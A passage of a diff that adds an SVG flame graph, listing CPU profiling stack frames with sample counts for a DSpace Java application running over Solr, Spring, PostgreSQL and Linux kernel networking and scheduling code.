+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="61.0" y="789" width="2.6" height="15.0" fill="rgb(219,77,77)" rx="2" ry="2" />
+<text  x="63.95" y="799.5" ></text>
+</g>
+<g >
+<title>native_write_msr (16 samples, 3.64%)</title><rect x="248.7" y="613" width="42.9" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="251.68" y="623.5" >nati..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="197" width="2.7" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="176.59" y="207.5" ></text>
+</g>
+<g >
+<title>tcp_write_xmit (33 samples, 7.50%)</title><rect x="565.1" y="661" width="88.5" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="568.14" y="671.5" >tcp_write_..</text>
+</g>
+<g >
+<title>__wake_up_common (2 samples, 0.45%)</title><rect x="610.7" y="341" width="5.4" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="613.73" y="351.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (2 samples, 0.45%)</title><rect x="1055.9" y="437" width="5.4" height="15.0" fill="rgb(104,249,104)" rx="2" ry="2" />
+<text  x="1058.91" y="447.5" ></text>
+</g>
+<g >
+<title>tcp_rcv_state_process (1 samples, 0.23%)</title><rect x="1128.3" y="69" width="2.7" height="15.0" fill="rgb(207,60,60)" rx="2" ry="2" />
+<text  x="1131.32" y="79.5" ></text>
+</g>
+<g >
+<title>jbyte_arraycopy (1 samples, 0.23%)</title><rect x="1072.0" y="309" width="2.7" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1075.00" y="319.5" ></text>
+</g>
+<g >
+<title>__x64_sys_mprotect (1 samples, 0.23%)</title><rect x="347.9" y="661" width="2.7" height="15.0" fill="rgb(219,77,77)" rx="2" ry="2" />
+<text  x="350.91" y="671.5" ></text>
+</g>
+<g >
+<title>pthread_cond_timedwait@@GLIBC_2.3.2 (25 samples, 5.68%)</title><rect x="63.6" y="789" width="67.1" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="66.64" y="799.5" >pthread..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="683.1" y="229" width="2.7" height="15.0" fill="rgb(215,72,72)" rx="2" ry="2" />
+<text  x="686.14" y="239.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (8 samples, 1.82%)</title><rect x="195.0" y="741" width="21.5" height="15.0" fill="rgb(200,51,51)" rx="2" ry="2" />
+<text  x="198.05" y="751.5" >_..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="389" width="2.7" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="176.59" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (189 samples, 42.95%)</title><rect x="667.0" y="597" width="506.9" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="670.05" y="607.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/dspace/servicemanager/DSpaceServiceManager:::getServicesByType (28 samples, 6.36%)</title><rect x="970.1" y="453" width="75.1" height="15.0" fill="rgb(82,230,82)" rx="2" ry="2" />
+<text  x="973.09" y="463.5" >org/dspa..</text>
+</g>
+<g >
+<title>org/apache/commons/logging/LogFactory$1:::run (2 samples, 0.45%)</title><rect x="841.4" y="293" width="5.3" height="15.0" fill="rgb(86,233,86)" rx="2" ry="2" />
+<text  x="844.36" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/JavaBinCodec:::readVal (1 samples, 0.23%)</title><rect x="1106.9" y="405" width="2.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1109.86" y="415.5" ></text>
+</g>
+<g >
+<title>start_thread (3 samples, 0.68%)</title><rect x="345.2" y="805" width="8.1" height="15.0" fill="rgb(254,129,129)" rx="2" ry="2" />
+<text  x="348.23" y="815.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (4 samples, 0.91%)</title><rect x="130.7" y="645" width="10.7" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="133.68" y="655.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.23%)</title><rect x="1160.5" y="437" width="2.7" height="15.0" fill="rgb(51,201,51)" rx="2" ry="2" />
+<text  x="1163.50" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (19 samples, 4.32%)</title><rect x="141.4" y="789" width="51.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="144.41" y="799.5" >[libj..</text>
+</g>
+<g >
+<title>org/springframework/core/convert/support/GenericConversionService:::getSourceConverterMap (1 samples, 0.23%)</title><rect x="849.4" y="357" width="2.7" height="15.0" fill="rgb(66,215,66)" rx="2" ry="2" />
+<text  x="852.41" y="367.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (4 samples, 0.91%)</title><rect x="299.6" y="629" width="10.8" height="15.0" fill="rgb(210,64,64)" rx="2" ry="2" />
+<text  x="302.64" y="639.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="240.6" y="757" width="5.4" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="243.64" y="767.5" ></text>
+</g>
+<g >
+<title>native_write_msr (16 samples, 3.64%)</title><rect x="15.4" y="613" width="42.9" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="18.36" y="623.5" >nati..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendSync (1 samples, 0.23%)</title><rect x="940.6" y="325" width="2.7" height="15.0" fill="rgb(54,203,54)" rx="2" ry="2" />
+<text  x="943.59" y="335.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (3 samples, 0.68%)</title><rect x="1066.6" y="389" width="8.1" height="15.0" fill="rgb(94,240,94)" rx="2" ry="2" />
+<text  x="1069.64" y="399.5" ></text>
+</g>
+<g >
+<title>call_stub (1 samples, 0.23%)</title><rect x="1123.0" y="341" width="2.6" height="15.0" fill="rgb(237,103,103)" rx="2" ry="2" />
+<text  x="1125.95" y="351.5" ></text>
+</g>
+<g >
+<title>native_write_msr (4 samples, 0.91%)</title><rect x="176.3" y="469" width="10.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="179.27" y="479.5" ></text>
+</g>
+<g >
+<title>Ljava/lang/ref/Finalizer$FinalizerThread:::run (1 samples, 0.23%)</title><rect x="216.5" y="661" width="2.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="219.50" y="671.5" ></text>
+</g>
+<g >
+<title>__x64_sys_sendto (40 samples, 9.09%)</title><rect x="557.1" y="757" width="107.3" height="15.0" fill="rgb(208,62,62)" rx="2" ry="2" />
+<text  x="560.09" y="767.5" >__x64_sys_sen..</text>
+</g>
+<g >
+<title>org/springframework/beans/PropertyEditorRegistrySupport:::createDefaultEditors (26 samples, 5.91%)</title><rect x="825.3" y="405" width="69.7" height="15.0" fill="rgb(63,211,63)" rx="2" ry="2" />
+<text  x="828.27" y="415.5" >org/spr..</text>
+</g>
+<g >
+<title>finish_task_switch (12 samples, 2.73%)</title><rect x="310.4" y="661" width="32.1" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="313.36" y="671.5" >fi..</text>
+</g>
+<g >
+<title>org/dspace/content/Collection:::groupFromColumn (1 samples, 0.23%)</title><rect x="943.3" y="437" width="2.7" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="946.27" y="447.5" ></text>
+</g>
+<g >
+<title>net_rx_action (16 samples, 3.64%)</title><rect x="600.0" y="517" width="42.9" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="603.00" y="527.5" >net_..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="243.3" y="613" width="2.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="246.32" y="623.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (8 samples, 1.82%)</title><rect x="219.2" y="773" width="21.4" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="222.18" y="783.5" >e..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (1 samples, 0.23%)</title><rect x="1109.5" y="437" width="2.7" height="15.0" fill="rgb(102,248,102)" rx="2" ry="2" />
+<text  x="1112.55" y="447.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultSingletonBeanRegistry:::getSingleton (2 samples, 0.45%)</title><rect x="1037.1" y="373" width="5.4" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="1040.14" y="383.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.23%)</title><rect x="350.6" y="709" width="2.7" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="353.59" y="719.5" ></text>
+</g>
+<g >
+<title>inet_stream_connect (1 samples, 0.23%)</title><rect x="1128.3" y="133" width="2.7" height="15.0" fill="rgb(223,83,83)" rx="2" ry="2" />
+<text  x="1131.32" y="143.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (4 samples, 0.91%)</title><rect x="176.3" y="501" width="10.7" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="179.27" y="511.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (8 samples, 1.82%)</title><rect x="195.0" y="773" width="21.5" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="198.05" y="783.5" >e..</text>
+</g>
+<g >
+<title>org/dspace/discovery/BitstreamContentStream:::getStream (2 samples, 0.45%)</title><rect x="680.5" y="421" width="5.3" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="683.45" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/FormBodyPart:::&lt;init&gt; (1 samples, 0.23%)</title><rect x="669.7" y="421" width="2.7" height="15.0" fill="rgb(99,245,99)" rx="2" ry="2" />
+<text  x="672.73" y="431.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (2 samples, 0.45%)</title><rect x="937.9" y="373" width="5.4" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="940.91" y="383.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (2 samples, 0.45%)</title><rect x="978.1" y="293" width="5.4" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="981.14" y="303.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (8 samples, 1.82%)</title><rect x="219.2" y="645" width="21.4" height="15.0" fill="rgb(214,71,71)" rx="2" ry="2" />
+<text  x="222.18" y="655.5" >_..</text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::unIndexContent (15 samples, 3.41%)</title><rect x="1109.5" y="469" width="40.3" height="15.0" fill="rgb(60,210,60)" rx="2" ry="2" />
+<text  x="1112.55" y="479.5" >org..</text>
+</g>
+<g >
+<title>org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (2 samples, 0.45%)</title><rect x="688.5" y="357" width="5.4" height="15.0" fill="rgb(82,229,82)" rx="2" ry="2" />
+<text  x="691.50" y="367.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.68%)</title><rect x="168.2" y="597" width="8.1" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="171.23" y="607.5" ></text>
+</g>
+<g >
+<title>hrtimer_start_range_ns (1 samples, 0.23%)</title><rect x="10.0" y="693" width="2.7" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="13.00" y="703.5" ></text>
+</g>
+<g >
+<title>rb_insert_color (1 samples, 0.23%)</title><rect x="10.0" y="645" width="2.7" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="13.00" y="655.5" ></text>
+</g>
+<g >
+<title>do_softirq.part.0 (19 samples, 4.32%)</title><rect x="592.0" y="565" width="50.9" height="15.0" fill="rgb(215,71,71)" rx="2" ry="2" />
+<text  x="594.95" y="575.5" >do_so..</text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (15 samples, 3.41%)</title><rect x="755.5" y="405" width="40.3" height="15.0" fill="rgb(106,252,106)" rx="2" ry="2" />
+<text  x="758.55" y="415.5" >org..</text>
+</g>
+<g >
+<title>[libjvm.so] (6 samples, 1.36%)</title><rect x="1173.9" y="757" width="16.1" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="1176.91" y="767.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::sequence (3 samples, 0.68%)</title><rect x="986.2" y="277" width="8.0" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="989.18" y="287.5" ></text>
+</g>
+<g >
+<title>[libjava.so] (1 samples, 0.23%)</title><rect x="1155.1" y="357" width="2.7" height="15.0" fill="rgb(250,122,122)" rx="2" ry="2" />
+<text  x="1158.14" y="367.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.23%)</title><rect x="1155.1" y="309" width="2.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="1158.14" y="319.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.23%)</title><rect x="946.0" y="437" width="2.6" height="15.0" fill="rgb(102,248,102)" rx="2" ry="2" />
+<text  x="948.95" y="447.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/env/AbstractEnvironment:::&lt;init&gt; (25 samples, 5.68%)</title><rect x="828.0" y="389" width="67.0" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="830.95" y="399.5" >org/spr..</text>
+</g>
+<g >
+<title>do_syscall_64 (13 samples, 2.95%)</title><rect x="310.4" y="757" width="34.8" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="313.36" y="767.5" >do..</text>
+</g>
+<g >
+<title>java/util/Collections$SynchronizedCollection:::add (1 samples, 0.23%)</title><rect x="970.1" y="405" width="2.7" height="15.0" fill="rgb(79,226,79)" rx="2" ry="2" />
+<text  x="973.09" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1098.8" y="293" width="2.7" height="15.0" fill="rgb(247,118,118)" rx="2" ry="2" />
+<text  x="1101.82" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="935.2" y="389" width="2.7" height="15.0" fill="rgb(58,207,58)" rx="2" ry="2" />
+<text  x="938.23" y="399.5" ></text>
+</g>
+<g >
+<title>nf_nat_ipv4_out (1 samples, 0.23%)</title><rect x="642.9" y="581" width="2.7" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="645.91" y="591.5" ></text>
+</g>
+<g >
+<title>java/util/concurrent/ConcurrentHashMap:::putVal (1 samples, 0.23%)</title><rect x="790.4" y="357" width="2.7" height="15.0" fill="rgb(75,223,75)" rx="2" ry="2" />
+<text  x="793.41" y="367.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.23%)</title><rect x="1128.3" y="325" width="2.7" height="15.0" fill="rgb(205,57,57)" rx="2" ry="2" />
+<text  x="1131.32" y="335.5" ></text>
+</g>
+<g >
+<title>org/dspace/browse/BrowseIndex:::getTableName (1 samples, 0.23%)</title><rect x="819.9" y="437" width="2.7" height="15.0" fill="rgb(100,246,100)" rx="2" ry="2" />
+<text  x="822.91" y="447.5" ></text>
+</g>
+<g >
+<title>java/security/AccessController:::doPrivileged (1 samples, 0.23%)</title><rect x="1090.8" y="373" width="2.7" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="1093.77" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/AbstractMultipartForm:::doWriteTo (2 samples, 0.45%)</title><rect x="688.5" y="341" width="5.4" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="691.50" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/util/ClientUtils:::writeVal (14 samples, 3.18%)</title><rect x="707.3" y="341" width="37.5" height="15.0" fill="rgb(52,201,52)" rx="2" ry="2" />
+<text  x="710.27" y="351.5" >org..</text>
+</g>
+<g >
+<title>JVM_FillInStackTrace (1 samples, 0.23%)</title><rect x="1144.4" y="165" width="2.7" height="15.0" fill="rgb(203,54,54)" rx="2" ry="2" />
+<text  x="1147.41" y="175.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.23%)</title><rect x="814.5" y="453" width="2.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="817.55" y="463.5" ></text>
+</g>
+<g >
+<title>native_write_msr (8 samples, 1.82%)</title><rect x="195.0" y="613" width="21.5" height="15.0" fill="rgb(218,77,77)" rx="2" ry="2" />
+<text  x="198.05" y="623.5" >n..</text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject$MetadataCache:::get (1 samples, 0.23%)</title><rect x="905.7" y="421" width="2.7" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="908.73" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="908.4" y="373" width="2.7" height="15.0" fill="rgb(201,52,52)" rx="2" ry="2" />
+<text  x="911.41" y="383.5" ></text>
+</g>
+<g >
+<title>nft_immediate_eval (1 samples, 0.23%)</title><rect x="640.2" y="405" width="2.7" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="643.23" y="415.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.23%)</title><rect x="1101.5" y="293" width="2.7" height="15.0" fill="rgb(204,56,56)" rx="2" ry="2" />
+<text  x="1104.50" y="303.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (2 samples, 0.45%)</title><rect x="978.1" y="213" width="5.4" height="15.0" fill="rgb(70,218,70)" rx="2" ry="2" />
+<text  x="981.14" y="223.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1098.8" y="277" width="2.7" height="15.0" fill="rgb(204,55,55)" rx="2" ry="2" />
+<text  x="1101.82" y="287.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/env/StandardEnvironment:::customizePropertySources (13 samples, 2.95%)</title><rect x="860.1" y="373" width="34.9" height="15.0" fill="rgb(50,200,50)" rx="2" ry="2" />
+<text  x="863.14" y="383.5" >or..</text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.23%)</title><rect x="350.6" y="693" width="2.7" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="353.59" y="703.5" ></text>
+</g>
+<g >
+<title>futex_wait (13 samples, 2.95%)</title><rect x="310.4" y="725" width="34.8" height="15.0" fill="rgb(225,86,86)" rx="2" ry="2" />
+<text  x="313.36" y="735.5" >fu..</text>
+</g>
+<g >
+<title>__poll (1 samples, 0.23%)</title><rect x="785.0" y="309" width="2.7" height="15.0" fill="rgb(224,86,86)" rx="2" ry="2" />
+<text  x="788.05" y="319.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="846.7" y="341" width="2.7" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="849.73" y="351.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (2 samples, 0.45%)</title><rect x="948.6" y="373" width="5.4" height="15.0" fill="rgb(92,238,92)" rx="2" ry="2" />
+<text  x="951.64" y="383.5" ></text>
+</g>
+<g >
+<title>pthread_cond_timedwait@@GLIBC_2.3.2 (13 samples, 2.95%)</title><rect x="310.4" y="789" width="34.8" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="313.36" y="799.5" >pt..</text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::receiveResponseEntity (1 samples, 0.23%)</title><rect x="1133.7" y="357" width="2.7" height="15.0" fill="rgb(95,241,95)" rx="2" ry="2" />
+<text  x="1136.68" y="367.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject:::getMetadata (1 samples, 0.23%)</title><rect x="905.7" y="437" width="2.7" height="15.0" fill="rgb(65,214,65)" rx="2" ry="2" />
+<text  x="908.73" y="447.5" ></text>
+</g>
+<g >
+<title>__x64_sys_mprotect (1 samples, 0.23%)</title><rect x="350.6" y="677" width="2.7" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="353.59" y="687.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="1141.7" y="261" width="5.4" height="15.0" fill="rgb(201,51,51)" rx="2" ry="2" />
+<text  x="1144.73" y="271.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (19 samples, 4.32%)</title><rect x="141.4" y="741" width="51.0" height="15.0" fill="rgb(205,57,57)" rx="2" ry="2" />
+<text  x="144.41" y="751.5" >[libj..</text>
+</g>
+<g >
+<title>org/dspace/content/Item:::find (2 samples, 0.45%)</title><rect x="1160.5" y="485" width="5.4" height="15.0" fill="rgb(54,204,54)" rx="2" ry="2" />
+<text  x="1163.50" y="495.5" ></text>
+</g>
+<g >
+<title>__libc_connect (1 samples, 0.23%)</title><rect x="1128.3" y="213" width="2.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1131.32" y="223.5" ></text>
+</g>
+<g >
+<title>__vsnprintf_internal (1 samples, 0.23%)</title><rect x="1141.7" y="213" width="2.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1144.73" y="223.5" ></text>
+</g>
+<g >
+<title>__tcp_push_pending_frames (33 samples, 7.50%)</title><rect x="565.1" y="677" width="88.5" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="568.14" y="687.5" >__tcp_push..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1171.2" y="309" width="2.7" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="1174.23" y="319.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (16 samples, 3.64%)</title><rect x="248.7" y="661" width="42.9" height="15.0" fill="rgb(219,78,78)" rx="2" ry="2" />
+<text  x="251.68" y="671.5" >fini..</text>
+</g>
+<g >
+<title>[libjvm.so] (189 samples, 42.95%)</title><rect x="667.0" y="773" width="506.9" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="670.05" y="783.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>java/util/concurrent/ConcurrentHashMap:::putVal (1 samples, 0.23%)</title><rect x="787.7" y="357" width="2.7" height="15.0" fill="rgb(103,248,103)" rx="2" ry="2" />
+<text  x="790.73" y="367.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.23%)</title><rect x="956.7" y="325" width="2.7" height="15.0" fill="rgb(75,223,75)" rx="2" ry="2" />
+<text  x="959.68" y="335.5" ></text>
+</g>
+<g >
+<title>_raw_spin_unlock (1 samples, 0.23%)</title><rect x="605.4" y="405" width="2.6" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="608.36" y="415.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::equals (2 samples, 0.45%)</title><rect x="927.2" y="389" width="5.3" height="15.0" fill="rgb(68,217,68)" rx="2" ry="2" />
+<text  x="930.18" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/configuration/DiscoverySearchFilter:::getIndexFieldName (1 samples, 0.23%)</title><rect x="1149.8" y="469" width="2.7" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="1152.77" y="479.5" ></text>
+</g>
+<g >
+<title>org/dspace/app/util/DailyFileAppender:::subAppend (2 samples, 0.45%)</title><rect x="680.5" y="357" width="5.3" height="15.0" fill="rgb(102,248,102)" rx="2" ry="2" />
+<text  x="683.45" y="367.5" ></text>
+</g>
+<g >
+<title>__sys_recvfrom (21 samples, 4.77%)</title><rect x="484.7" y="741" width="56.3" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="487.68" y="751.5" >__sys..</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="1141.7" y="245" width="5.4" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="1144.73" y="255.5" ></text>
+</g>
+<g >
+<title>__this_cpu_preempt_check (1 samples, 0.23%)</title><rect x="594.6" y="517" width="2.7" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="597.64" y="527.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (1 samples, 0.23%)</title><rect x="798.5" y="357" width="2.6" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="801.45" y="367.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (16 samples, 3.64%)</title><rect x="15.4" y="661" width="42.9" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="18.36" y="671.5" >fini..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="243.3" y="597" width="2.7" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="246.32" y="607.5" ></text>
+</g>
+<g >
+<title>Java_java_net_PlainSocketImpl_socketConnect (1 samples, 0.23%)</title><rect x="1128.3" y="229" width="2.7" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="1131.32" y="239.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.23%)</title><rect x="701.9" y="325" width="2.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="704.91" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/PatternParser$NamedPatternConverter:::convert (1 samples, 0.23%)</title><rect x="1157.8" y="405" width="2.7" height="15.0" fill="rgb(56,206,56)" rx="2" ry="2" />
+<text  x="1160.82" y="415.5" ></text>
+</g>
+<g >
+<title>preempt_count_sub (1 samples, 0.23%)</title><rect x="562.5" y="677" width="2.6" height="15.0" fill="rgb(208,62,62)" rx="2" ry="2" />
+<text  x="565.45" y="687.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingConnection$PStmtKey:::hashCode (1 samples, 0.23%)</title><rect x="913.8" y="373" width="2.7" height="15.0" fill="rgb(67,215,67)" rx="2" ry="2" />
+<text  x="916.77" y="383.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (22 samples, 5.00%)</title><rect x="482.0" y="789" width="59.0" height="15.0" fill="rgb(240,109,109)" rx="2" ry="2" />
+<text  x="485.00" y="799.5" >entry_..</text>
+</g>
+<g >
+<title>java/util/AbstractCollection:::toArray (1 samples, 0.23%)</title><rect x="1042.5" y="373" width="2.7" height="15.0" fill="rgb(82,229,82)" rx="2" ry="2" />
+<text  x="1045.50" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (4 samples, 0.91%)</title><rect x="685.8" y="405" width="10.7" height="15.0" fill="rgb(81,229,81)" rx="2" ry="2" />
+<text  x="688.82" y="415.5" ></text>
+</g>
+<g >
+<title>__release_sock (1 samples, 0.23%)</title><rect x="1128.3" y="101" width="2.7" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1131.32" y="111.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Node:::match (1 samples, 0.23%)</title><rect x="1080.0" y="405" width="2.7" height="15.0" fill="rgb(65,213,65)" rx="2" ry="2" />
+<text  x="1083.05" y="415.5" ></text>
+</g>
+<g >
+<title>arrayof_jint_fill (1 samples, 0.23%)</title><rect x="943.3" y="309" width="2.7" height="15.0" fill="rgb(219,77,77)" rx="2" ry="2" />
+<text  x="946.27" y="319.5" ></text>
+</g>
+<g >
+<title>update_rq_clock (1 samples, 0.23%)</title><rect x="613.4" y="293" width="2.7" height="15.0" fill="rgb(210,65,65)" rx="2" ry="2" />
+<text  x="616.41" y="303.5" ></text>
+</g>
+<g >
+<title>Reference_Handl (10 samples, 2.27%)</title><rect x="219.2" y="821" width="26.8" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="222.18" y="831.5" >R..</text>
+</g>
+<g >
+<title>Interpreter (189 samples, 42.95%)</title><rect x="667.0" y="645" width="506.9" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="670.05" y="655.5" >Interpreter</text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.23%)</title><rect x="1064.0" y="437" width="2.6" height="15.0" fill="rgb(254,129,129)" rx="2" ry="2" />
+<text  x="1066.95" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="309" width="2.7" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="176.59" y="319.5" ></text>
+</g>
